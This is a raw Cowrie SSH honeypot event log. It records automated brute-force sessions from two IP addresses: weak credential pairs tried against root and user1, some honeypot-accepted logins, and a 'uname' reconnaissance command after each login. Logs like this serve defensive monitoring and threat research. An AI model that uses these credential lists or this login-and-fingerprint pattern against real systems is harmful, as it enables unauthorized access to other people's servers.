{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.456831Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.512062Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.773464Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.946159Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:39.072470Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.073119Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.179586Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.180637Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:39.251854Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.252526Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.397887Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:39.399043Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56336,"dst_ip":"1.2.3.4","dst_port":22,"session":"69589b914df3","protocol":"ssh","message":"New connection: 212.227.125.160:56336 (1.2.3.4:22) [session: 69589b914df3]","sensor":"my-vps","timestamp":"2025-08-28T05:25:46.924094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:47.106884Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:47.107623Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:48.400737Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:48.824717Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:48.825374Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:48.930113Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:48.931267Z","src_ip":"212.227.125.160","session":"69589b914df3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58666,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1de3155e201","protocol":"ssh","message":"New connection: 212.227.235.229:58666 (1.2.3.4:22) [session: e1de3155e201]","sensor":"my-vps","timestamp":"2025-08-28T05:25:53.888913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:53.889869Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:54.033935Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:54.469346Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:54.773986Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:54.774783Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:54.920478Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:54.921878Z","src_ip":"212.227.235.229","session":"e1de3155e201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40668,"dst_ip":"1.2.3.4","dst_port":22,"session":"8338736d5bbf","protocol":"ssh","message":"New connection: 212.227.125.160:40668 (1.2.3.4:22) [session: 8338736d5bbf]","sensor":"my-vps","timestamp":"2025-08-28T05:26:01.368937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:01.378238Z","src_ip":"212.227.125.160","session":"8338736d5bbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:01.483466Z","src_ip":"212.227.125.160","session":"8338736d5bbf"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:01.887985Z","src_ip":"212.227.125.160","session":"8338736d5bbf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:02.993924Z","src_ip":"212.227.125.160","session":"8338736d5bbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54196,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab0420c30f2","protocol":"ssh","message":"New connection: 212.227.235.229:54196 (1.2.3.4:22) [session: 9ab0420c30f2]","sensor":"my-vps","timestamp":"2025-08-28T05:26:09.485556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:09.487167Z","src_ip":"212.227.235.229","session":"9ab0420c30f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:09.628591Z","src_ip":"212.227.235.229","session":"9ab0420c30f2"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:10.099400Z","src_ip":"212.227.235.229","session":"9ab0420c30f2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:11.243617Z","src_ip":"212.227.235.229","session":"9ab0420c30f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58124,"dst_ip":"1.2.3.4","dst_port":22,"session":"683fafe980b8","protocol":"ssh","message":"New connection: 212.227.125.160:58124 (1.2.3.4:22) [session: 683fafe980b8]","sensor":"my-vps","timestamp":"2025-08-28T05:26:16.069892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:16.075444Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:16.173702Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:26:16.587234Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:26:16.906281Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:26:16.906967Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:17.013936Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:17.014956Z","src_ip":"212.227.125.160","session":"683fafe980b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50608,"dst_ip":"1.2.3.4","dst_port":22,"session":"71905230eade","protocol":"ssh","message":"New connection: 212.227.235.229:50608 (1.2.3.4:22) [session: 71905230eade]","sensor":"my-vps","timestamp":"2025-08-28T05:26:24.496305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:24.498796Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:24.640337Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:26:25.215555Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:26:25.608886Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:26:25.609711Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:25.755231Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:25.756291Z","src_ip":"212.227.235.229","session":"71905230eade"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60272,"dst_ip":"1.2.3.4","dst_port":22,"session":"98d3762533fa","protocol":"ssh","message":"New connection: 212.227.125.160:60272 (1.2.3.4:22) [session: 98d3762533fa]","sensor":"my-vps","timestamp":"2025-08-28T05:26:31.363810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:31.390596Z","src_ip":"212.227.125.160","session":"98d3762533fa"}
